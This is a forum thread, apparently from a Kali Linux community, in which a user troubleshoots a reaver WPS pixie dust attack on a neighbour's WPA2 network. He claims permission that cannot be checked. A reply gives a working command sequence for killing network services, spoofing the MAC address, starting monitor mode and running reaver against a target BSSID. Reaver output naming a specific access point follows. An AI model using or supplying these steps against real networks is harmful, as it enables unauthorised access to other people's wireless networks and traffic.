Thread: Problem associating with wpa2 network

Problem associating with wpa2 network

Just for the record, I have a friend next door who gave me permission to hack his network. I asked him if I could use it for the time being and he told me that I could use it if I hacked it because he wanted to set if I could do it, lol but anyways, to the point.. He has a WPA2 network with WPS enabled and I was trying to use reaver's pixie dust attack on it which I've done before numerous times but this network has a hard time associating with it for some reason even though the wifi signal has between 4 and 5 bars all the time. I'm also using kali linux 2.0. Any help would be great! Thanks!

Quote Originally Posted by hotshot247 View Post
    Just for the record, I have a friend next door who gave me permission to hack his network. I asked him if I could use it for the time being and he told me that I could use it if I hacked it because he wanted to set if I could do it, lol but anyways, to the point.. He has a WPA2 network with WPS enabled and I was trying to use reaver's pixie dust attack on it which I've done before numerous times but this network has a hard time associating with it for some reason even though the wifi signal has between 4 and 5 bars all the time. I'm also using kali linux 2.0. Any help would be great! Thanks!
    Try this:

airmon-ng check kill
    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
    airmon-ng start wlan0

Blacklist wlanX & monX by adding the interface names to /etc/network/interfaces.

service network-manager start

reaver -i mon0 -c <AP_Channel> -b <BSSID_of_target> -vvv -P --mac=00:11:22:33:44:55
    Last edited by slim76; 2015-10-17 at 19:33.

hey, thanks for the input but for some reason, it's still doing it. here is exactly what it says
    Code:
    root@kali:~# reaver -i wlan1mon -c 6 -b 88:F7:C7:3A:63:72 -vvv -P --mac=00:11:22:33:44:55 -K 1 

Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 6
    [+] Waiting for beacon from 88:F7:C7:3A:63:72
    [!] WARNING: Failed to associate with 88:F7:C7:3A:63:72 (ESSID: Christina2)
    and then the last line that says "WARNING: failed to associate......", that just keeps repeating over and over. it's weird that it won't associate with it even though i'm right next door.

Quote Originally Posted by hotshot247 View Post
    hey, thanks for the input but for some reason, it's still doing it. here is exactly what it says
    Code:
    root@kali:~# reaver -i wlan1mon -c 6 -b 88:F7:C7:3A:63:72 -vvv -P --mac=00:11:22:33:44:55 -K 1 

Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 6
    [+] Waiting for beacon from 88:F7:C7:3A:63:72
    [!] WARNING: Failed to associate with 88:F7:C7:3A:63:72 (ESSID: Christina2)
    and then the last line that says "WARNING: failed to associate......", that just keeps repeating over and over. it's weird that it won't associate with it even though i'm right next door.
    The commands I posted work for me, does the attack work if you don't spoof your mac address?.
    Use macchanger to check you're not spoofing your mac address.